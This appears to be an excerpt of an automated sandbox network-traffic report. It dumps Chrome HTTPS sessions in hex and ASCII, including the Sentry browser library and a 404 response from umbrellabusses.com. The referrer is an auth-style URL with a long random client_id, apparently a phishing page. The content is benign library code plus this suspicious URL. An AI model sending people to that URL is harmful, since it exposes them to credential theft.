                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC917INData Raw: 2c 73 74 79 6c 65 3a 7b 64 69 73 70 6c 61 79 3a 22 6e 6f 6e 65 22 7d 7d 29 7d 2c 37 35 31 32 30 3a 28 65 2c 74 2c 61 29 3d 3e 7b 61 2e 72 28 74 29 2c 61 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 28 29 3d 3e 64 7d 29 3b 76 61 72 20 6e 3d 61 28 34 31 35 39 34 29 2c 73 3d 61 2e 6e 28 6e 29 3b 63 6f 6e 73 74 20 64 3d 28 7b 63 68 69 6c 64 72 65 6e 3a 65 2c 69 64 3a 74 2c 63 6c 61 73 73 4e 61 6d 65 3a 61 2c 72 65 6e 64 65 72 43 6f 6d 70 43 73 73 49 6e 53 69 74 65 52 6f 6f 74 3a 6e 2c 63 6f 6d 70 6f 6e 65 6e 74 73 43 73 73 3a 64 7d 29 3d 3e 73 28 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 2c 7b 69 64 3a 74 2c 63 6c 61 73 73 4e 61 6d 65 3a 61 7d 2c 6e 26 26 64 26 26 64 2e 6d 61 70 28 28 28 7b 43 53 53 3a 65 7d 29 3d 3e 65 29 29 2c 65 28 29 29
                                                                                                                                                                                                                        Data Ascii: ,style:{display:"none"}})},75120:(e,t,a)=>{a.r(t),a.d(t,{default:()=>d});var n=a(41594),s=a.n(n);const d=({children:e,id:t,className:a,renderCompCssInSiteRoot:n,componentsCss:d})=>s().createElement("div",{id:t,className:a},n&&d&&d.map((({CSS:e})=>e)),e())


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        81192.168.2.549997151.101.130.2174435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:06 UTC549OUTGET /6.18.2/bundle.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: browser.sentry-cdn.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC547INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Length: 65254
                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                        Expires: Mon, 03 Nov 2025 07:07:03 GMT
                                                                                                                                                                                                                        Last-Modified: Tue, 08 Mar 2022 14:01:18 GMT
                                                                                                                                                                                                                        ETag: W/"5b6773578af8dd5591339930c2b29024"
                                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                        X-GUploader-Response-Body-Transformations: gunzipped
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Age: 3885053
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:07 GMT
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        Server: Fastly
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 2f 2a 21 20 40 73 65 6e 74 72 79 2f 62 72 6f 77 73 65 72 20 36 2e 31 38 2e 32 20 28 32 32 66 35 31 38 65 29 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 67 65 74 73 65 6e 74 72 79 2f 73 65 6e 74 72 79 2d 6a 61 76 61 73 63 72 69 70 74 20 2a 2f 0a 76 61 72 20 53 65 6e 74 72 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 72 65 74 75 72 6e 20 6e 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 5b 5d 7d 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 26 26 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 6e 7d 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 6e 29
                                                                                                                                                                                                                        Data Ascii: /*! @sentry/browser 6.18.2 (22f518e) | https://github.com/getsentry/sentry-javascript */var Sentry=function(t){var n=function(t,r){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,n){t.__proto__=n}||function(t,n){for(var r in n)
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 74 3d 74 2e 63 6f 6e 63 61 74 28 75 28 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 29 29 3b 72 65 74 75 72 6e 20 74 7d 74 2e 53 65 76 65 72 69 74 79 3d 76 6f 69 64 20 30 2c 28 69 3d 74 2e 53 65 76 65 72 69 74 79 7c 7c 28 74 2e 53 65 76 65 72 69 74 79 3d 7b 7d 29 29 2e 46 61 74 61 6c 3d 22 66 61 74 61 6c 22 2c 69 2e 45 72 72 6f 72 3d 22 65 72 72 6f 72 22 2c 69 2e 57 61 72 6e 69 6e 67 3d 22 77 61 72 6e 69 6e 67 22 2c 69 2e 4c 6f 67 3d 22 6c 6f 67 22 2c 69 2e 49 6e 66 6f 3d 22 69 6e 66 6f 22 2c 69 2e 44 65 62 75 67 3d 22 64 65 62 75 67 22 2c 69 2e 43 72 69 74 69 63 61 6c 3d 22 63 72 69 74 69 63 61 6c 22 3b 76 61 72 20 63 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b
                                                                                                                                                                                                                        Data Ascii: t=[],n=0;n<arguments.length;n++)t=t.concat(u(arguments[n]));return t}t.Severity=void 0,(i=t.Severity||(t.Severity={})).Fatal="fatal",i.Error="error",i.Warning="warning",i.Log="log",i.Info="info",i.Debug="debug",i.Critical="critical";var c={};function s(){
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 7d 29 29 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 5b 74 2c 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 5d 7d 29 29 3a 6e 75 6c 6c 3b 69 66 28 73 26 26 73 2e 6c 65 6e 67 74 68 29 73 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 2e 70 75 73 68 28 22 5b 22 2b 74 5b 30 5d 2b 27 3d 22 27 2b 74 5b 31 5d 2b 27 22 5d 27 29 7d 29 29 3b 65 6c 73 65 20 69 66 28 61 2e 69 64 26 26 63 2e 70 75 73 68 28 22 23 22 2b 61 2e 69 64 29 2c 28 72 3d 61 2e 63 6c 61 73 73 4e 61 6d 65 29 26 26 70 28 72 29 29 66 6f 72 28 69 3d 72 2e 73 70 6c 69 74 28 2f 5c 73 2b 2f 29 2c 75 3d 30 3b 75 3c 69 2e 6c 65 6e 67 74 68 3b 75 2b 2b
                                                                                                                                                                                                                        Data Ascii: ction(t){return a.getAttribute(t)})).map((function(t){return[t,a.getAttribute(t)]})):null;if(s&&s.length)s.forEach((function(t){c.push("["+t[0]+'="'+t[1]+'"]')}));else if(a.id&&c.push("#"+a.id),(r=a.className)&&p(r))for(i=r.split(/\s+/),u=0;u<i.length;u++
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 3d 72 5b 30 5d 2c 65 3d 72 5b 31 5d 2c 6f 3d 72 5b 32 5d 2c 61 3d 76 6f 69 64 20 30 3d 3d 3d 6f 3f 22 22 3a 6f 2c 63 3d 72 5b 33 5d 2c 73 3d 72 5b 34 5d 2c 66 3d 76 6f 69 64 20 30 3d 3d 3d 73 3f 22 22 3a 73 2c 68 3d 22 22 2c 76 3d 72 5b 35 5d 2c 64 3d 76 2e 73 70 6c 69 74 28 22 2f 22 29 3b 69 66 28 64 2e 6c 65 6e 67 74 68 3e 31 26 26 28 68 3d 64 2e 73 6c 69 63 65 28 30 2c 2d 31 29 2e 6a 6f 69 6e 28 22 2f 22 29 2c 76 3d 64 2e 70 6f 70 28 29 29 2c 76 29 7b 76 61 72 20 6c 3d 76 2e 6d 61 74 63 68 28 2f 5e 5c 64 2b 2f 29 3b 6c 26 26 28 76 3d 6c 5b 30 5d 29 7d 72 65 74 75 72 6e 20 54 28 7b 68 6f 73 74 3a 63 2c 70 61 73 73 3a 61 2c 70 61 74 68 3a 68 2c 70 72 6f 6a 65 63 74 49 64 3a 76 2c 70 6f 72 74 3a 66 2c 70 72 6f 74 6f 63 6f 6c 3a 69 2c 70 75 62 6c 69 63 4b
                                                                                                                                                                                                                        Data Ascii: =r[0],e=r[1],o=r[2],a=void 0===o?"":o,c=r[3],s=r[4],f=void 0===s?"":s,h="",v=r[5],d=v.split("/");if(d.length>1&&(h=d.slice(0,-1).join("/"),v=d.pop()),v){var l=v.match(/^\d+/);l&&(v=l[0])}return T({host:c,pass:a,path:h,projectId:v,port:f,protocol:i,publicK
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 65 77 20 71 29 3b 66 75 6e 63 74 69 6f 6e 20 43 28 74 29 7b 69 66 28 21 74 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6e 3d 74 2c 72 3d 6e 5b 30 5d 2e 66 75 6e 63 74 69 6f 6e 7c 7c 22 22 2c 69 3d 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 2e 66 75 6e 63 74 69 6f 6e 7c 7c 22 22 3b 72 65 74 75 72 6e 2d 31 3d 3d 3d 72 2e 69 6e 64 65 78 4f 66 28 22 63 61 70 74 75 72 65 4d 65 73 73 61 67 65 22 29 26 26 2d 31 3d 3d 3d 72 2e 69 6e 64 65 78 4f 66 28 22 63 61 70 74 75 72 65 45 78 63 65 70 74 69 6f 6e 22 29 7c 7c 28 6e 3d 6e 2e 73 6c 69 63 65 28 31 29 29 2c 2d 31 21 3d 3d 69 2e 69 6e 64 65 78 4f 66 28 22 73 65 6e 74 72 79 57 72 61 70 70 65 64 22 29 26 26 28 6e 3d 6e 2e 73 6c 69 63 65 28 30 2c 2d 31 29 29 2c 6e 2e 73 6c 69 63 65 28 30 2c 35 30 29 2e
                                                                                                                                                                                                                        Data Ascii: ew q);function C(t){if(!t.length)return[];var n=t,r=n[0].function||"",i=n[n.length-1].function||"";return-1===r.indexOf("captureMessage")&&-1===r.indexOf("captureException")||(n=n.slice(1)),-1!==i.indexOf("sentryWrapped")&&(n=n.slice(0,-1)),n.slice(0,50).
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 2e 74 61 72 67 65 74 29 3a 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 2e 74 61 72 67 65 74 29 7d 63 61 74 63 68 28 74 29 7b 6f 2e 74 61 72 67 65 74 3d 22 3c 75 6e 6b 6e 6f 77 6e 3e 22 7d 74 72 79 7b 6f 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 3d 77 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 3f 45 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 3a 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 7d 63 61 74 63 68 28 74 29 7b 6f 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 3d 22 3c 75 6e 6b 6e 6f 77 6e 3e 22 7d 66 6f 72 28 76 61 72 20 75 20 69 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20
                                                                                                                                                                                                                        Data Ascii: .target):Object.prototype.toString.call(e.target)}catch(t){o.target="<unknown>"}try{o.currentTarget=w(e.currentTarget)?E(e.currentTarget):Object.prototype.toString.call(e.currentTarget)}catch(t){o.currentTarget="<unknown>"}for(var u in"undefined"!=typeof
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 74 65 28 74 29 3b 65 6c 73 65 20 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 6f 5b 6e 5d 3d 3d 3d 74 29 7b 6f 2e 73 70 6c 69 63 65 28 6e 2c 31 29 3b 62 72 65 61 6b 7d 7d 5d 29 3b 76 61 72 20 61 3d 75 28 69 2c 32 29 2c 63 3d 61 5b 30 5d 2c 73 3d 61 5b 31 5d 3b 69 66 28 30 3d 3d 3d 72 29 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 29 72 65 74 75 72 6e 20 74 3b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 74 29 3b 69 66 28 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3d 3d 3d 6e 29 72 65 74 75 72 6e 22 5b 4f 62 6a 65 63 74 5d 22 3b 69 66 28 22 5b 6f 62 6a 65 63 74 20
                                                                                                                                                                                                                        Data Ascii: te(t);else for(var n=0;n<o.length;n++)if(o[n]===t){o.splice(n,1);break}}]);var a=u(i,2),c=a[0],s=a[1];if(0===r)return function(t){if("string"==typeof t)return t;var n=Object.prototype.toString.call(t);if("[object Object]"===n)return"[Object]";if("[object
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 64 65 5c 5d 5c 73 2b 5c 7d 24 2f 2e 74 65 73 74 28 74 2e 74 6f 53 74 72 69 6e 67 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 72 74 28 29 7b 69 66 28 21 74 74 28 29 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 52 65 71 75 65 73 74 28 22 5f 22 2c 7b 72 65 66 65 72 72 65 72 50 6f 6c 69 63 79 3a 22 6f 72 69 67 69 6e 22 7d 29 2c 21 30 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 21 31 7d 7d 76 61 72 20 69 74 2c 65 74 3d 73 28 29 2c 6f 74 3d 7b 7d 2c 75 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 61 74 28 74 29 7b 69 66 28 21 75 74 5b 74 5d 29 73 77 69 74 63 68 28 75 74 5b 74 5d 3d 21 30 2c 74 29 7b 63 61 73 65 22 63 6f 6e 73 6f 6c 65 22 3a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 28 22 63 6f 6e 73 6f 6c 65 22 69 6e 20 65 74 29
                                                                                                                                                                                                                        Data Ascii: de\]\s+\}$/.test(t.toString())}function rt(){if(!tt())return!1;try{return new Request("_",{referrerPolicy:"origin"}),!0}catch(t){return!1}}var it,et=s(),ot={},ut={};function at(t){if(!ut[t])switch(ut[t]=!0,t){case"console":!function(){if(!("console"in et)
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 68 61 6e 64 6c 65 72 3d 76 6f 69 64 20 30 2c 64 65 6c 65 74 65 20 6f 5b 6e 5d 29 2c 30 3d 3d 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6f 29 2e 6c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 65 2e 5f 5f 73 65 6e 74 72 79 5f 69 6e 73 74 72 75 6d 65 6e 74 61 74 69 6f 6e 5f 68 61 6e 64 6c 65 72 73 5f 5f 29 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 20 74 2e 63 61 6c 6c 28 74 68 69 73 2c 6e 2c 72 2c 69 29 7d 7d 29 29 29 7d 29 29 7d 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 78 68 72 22 3a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 28 22 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 22 69 6e 20 65 74 29 29 72 65 74 75 72 6e 3b 76 61 72 20 74 3d 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 2e 70 72 6f 74 6f 74 79 70 65 3b 58 28 74 2c 22 6f 70 65 6e 22 2c 28 66
                                                                                                                                                                                                                        Data Ascii: handler=void 0,delete o[n]),0===Object.keys(o).length&&delete e.__sentry_instrumentation_handlers__)}catch(t){}return t.call(this,n,r,i)}})))}))}();break;case"xhr":!function(){if(!("XMLHttpRequest"in et))return;var t=XMLHttpRequest.prototype;X(t,"open",(f
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1379INData Raw: 69 2e 68 69 64 64 65 6e 3d 21 30 2c 72 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 29 2c 69 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 26 26 69 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 66 65 74 63 68 26 26 28 6e 3d 6e 74 28 69 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 66 65 74 63 68 29 29 2c 72 2e 68 65 61 64 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 69 29 7d 63 61 74 63 68 28 74 29 7b 7d 72 65 74 75 72 6e 20 6e 7d 28 29 29 72 65 74 75 72 6e 3b 58 28 65 74 2c 22 66 65 74 63 68 22 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 5b 5d 2c 72 3d 30 3b 72 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 5b 72 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 72
                                                                                                                                                                                                                        Data Ascii: i.hidden=!0,r.head.appendChild(i),i.contentWindow&&i.contentWindow.fetch&&(n=nt(i.contentWindow.fetch)),r.head.removeChild(i)}catch(t){}return n}())return;X(et,"fetch",(function(t){return function(){for(var n=[],r=0;r<arguments.length;r++)n[r]=arguments[r


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        82192.168.2.550004104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC839OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                        Referer: https://umbrellabusses.com/samhentir/auth/?client_id=nh8u3iswi2jj7h2yyyiepds8uy7e2nepisuuojswwpyuhds2euyjfpihhieewiyhpiybnj8oieaeuuywfio8eujn2uih8dtitoupoiiw8ywoeiywiwyjh72edee8suawdu88tah7obyauys32heunbiepii7us8epwejw2jena7y8yn77nf3n82tjaa7wuop87swnauh8ia&key=256&id=295440
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC833INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:07 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        Cache-Control: max-age=14400
                                                                                                                                                                                                                        CF-Cache-Status: EXPIRED
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wChdzUC8WBgGMednpBYVVauLNYqHDsfVOPoWDuOCBDKJmIiE%2FcRujCcr4uHW6HmE29BnJVFnOtBjy4OBeR4ucMX1KQXsifDYXiITYn6FdrLE0T6Rvfr1ZOz6PRhZxcODC6BocTE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd26c38cb5de97-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1701&min_rtt=1694&rtt_var=649&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1417&delivery_rate=1668571&cwnd=238&unsent_bytes=0&cid=387a7f081442a86e&ts=441&x=0"
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC536INData Raw: 37 64 33 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68
                                                                                                                                                                                                                        Data Ascii: 7d36<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}h
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1369INData Raw: 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a
                                                                                                                                                                                                                        Data Ascii: .logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1369INData Raw: 4c 44 6f 76 65 59 79 34 46 44 44 49 44 5a 6a 36 47 72 54 7a 51 63 68 30 2b 73 6b 68 54 7a 59 35 64 65 49 59 66 37 62 6d 75 62 6e 4a 33 64 55 77 4b 37 61 2b 73 61 6c 55 42 7a 66 6c 32 63 5a 59 4a 41 66 51 41 30 42 2f 44 71 59 2b 6e 73 45 34 7a 48 59 62 6d 66 6a 77 41 49 41 4c 6a 72 47 63 6c 52 43 55 4d 50 72 62 4e 4b 34 72 35 43 37 43 53 4f 77 34 70 6e 71 76 42 31 64 36 33 50 69 61 62 52 37 62 36 46 68 6a 59 41 71 41 71 67 4d 34 31 74 56 2b 2b 78 39 76 6f 4a 59 74 6d 52 38 61 55 42 76 4d 4f 41 38 75 6e 6d 33 4b 2b 2f 50 54 5a 78 77 2b 2f 64 33 6a 6c 32 35 50 4c 35 65 72 6d 69 64 54 48 6b 44 5a 47 48 49 4f 44 57 33 6e 63 43 5a 71 43 57 4d 41 5a 41 36 62 7a 44 67 32 6c 73 65 38 38 6f 79 34 31 34 48 4a 59 62 32 58 52 2b 33 74 4d 41 58 6e 37 77 74 38 53 6b 72
                                                                                                                                                                                                                        Data Ascii: LDoveYy4FDDIDZj6GrTzQch0+skhTzY5deIYf7bmubnJ3dUwK7a+salUBzfl2cZYJAfQA0B/DqY+nsE4zHYbmfjwAIALjrGclRCUMPrbNK4r5C7CSOw4pnqvB1d63PiabR7b6FhjYAqAqgM41tV++x9voJYtmR8aUBvMOA8unm3K+/PTZxw+/d3jl25PL5ermidTHkDZGHIODW3ncCZqCWMAZA6bzDg2lse88oy414HJYb2XR+3tMAXn7wt8Skr
                                                                                                                                                                                                                        2025-01-10 13:53:07 UTC1369INData Raw: 78 51 4a 55 47 6e 6c 50 79 59 55 34 43 34 59 52 39 4d 77 2b 75 67 41 47 58 41 4a 79 33 5a 55 4d 41 72 4a 49 55 37 46 57 70 64 44 59 59 62 4b 31 6a 2b 51 4a 34 79 70 58 39 38 31 42 34 70 4b 36 48 34 6c 45 5a 67 48 64 52 4a 7a 6d 69 54 4d 41 33 44 53 6f 2b 57 45 46 62 5a 79 44 68 68 70 4b 62 4c 6a 73 79 50 76 6a 64 6d 76 58 54 51 31 59 76 61 71 33 6c 68 56 36 51 6f 37 64 76 41 44 67 45 59 45 64 38 6e 32 68 4a 53 54 76 2f 5a 68 71 76 36 4e 51 55 73 73 78 4c 46 51 42 42 52 50 67 31 76 6b 2f 61 4f 6f 7a 32 4c 73 75 6d 78 64 36 79 64 33 33 2f 6b 4d 69 6b 5a 55 66 47 6e 77 62 77 6a 43 30 37 53 57 49 42 62 54 72 55 6f 79 33 48 72 79 55 44 5a 45 75 72 7a 43 50 71 35 32 49 38 44 73 76 31 46 42 6e 4f 41 41 41 45 4a 50 31 79 63 4b 63 4a 6e 4b 49 52 31 68 6b 32 50 54
                                                                                                                                                                                                                        Data Ascii: xQJUGnlPyYU4C4YR9Mw+ugAGXAJy3ZUMArJIU7FWpdDYYbK1j+QJ4ypX981B4pK6H4lEZgHdRJzmiTMA3DSo+WEFbZyDhhpKbLjsyPvjdmvXTQ1Yvaq3lhV6Qo7dvADgEYEd8n2hJSTv/Zhqv6NQUssxLFQBBRPg1vk/aOoz2Lsumxd6yd33/kMikZUfGnwbwjC07SWIBbTrUoy3HryUDZEurzCPq52I8Dsv1FBnOAAAEJP1ycKcJnKIR1hk2PT
